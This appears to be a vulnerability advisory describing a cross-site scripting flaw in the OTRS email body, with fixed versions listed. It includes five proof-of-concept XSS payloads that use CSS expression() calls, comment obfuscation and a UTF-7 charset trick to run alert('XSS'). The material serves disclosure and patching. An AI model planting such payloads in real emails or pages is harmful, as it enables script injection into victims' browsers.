Software Engineering Institute

Open Technology Real Services (OTRS) contains a cross-site scripting (CWE-79) vulnerability in the email body. An attacker may be able to load arbitrary script in the context of the user's browser when they view a specifically crafted email message.

Proof-of-Concept:

• <DIV STYLE="width: expression(alert('XSS'));">
• exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
• <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
• <XSS STYLE="xss:expression(alert('XSS'))">
• <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

An attacker may be able to execute arbitrary script in the context of the user's browser.

Apply an Update
The OTRS advisory states:
This vulnerability is fixed in OTRS 2.4.13, 3.0.15 and 3.1.9 as well as in in OTRS::ITSM 3.1.6, 3.0.6 and 2.1.5. and it is recommended to upgrade to one of these versions.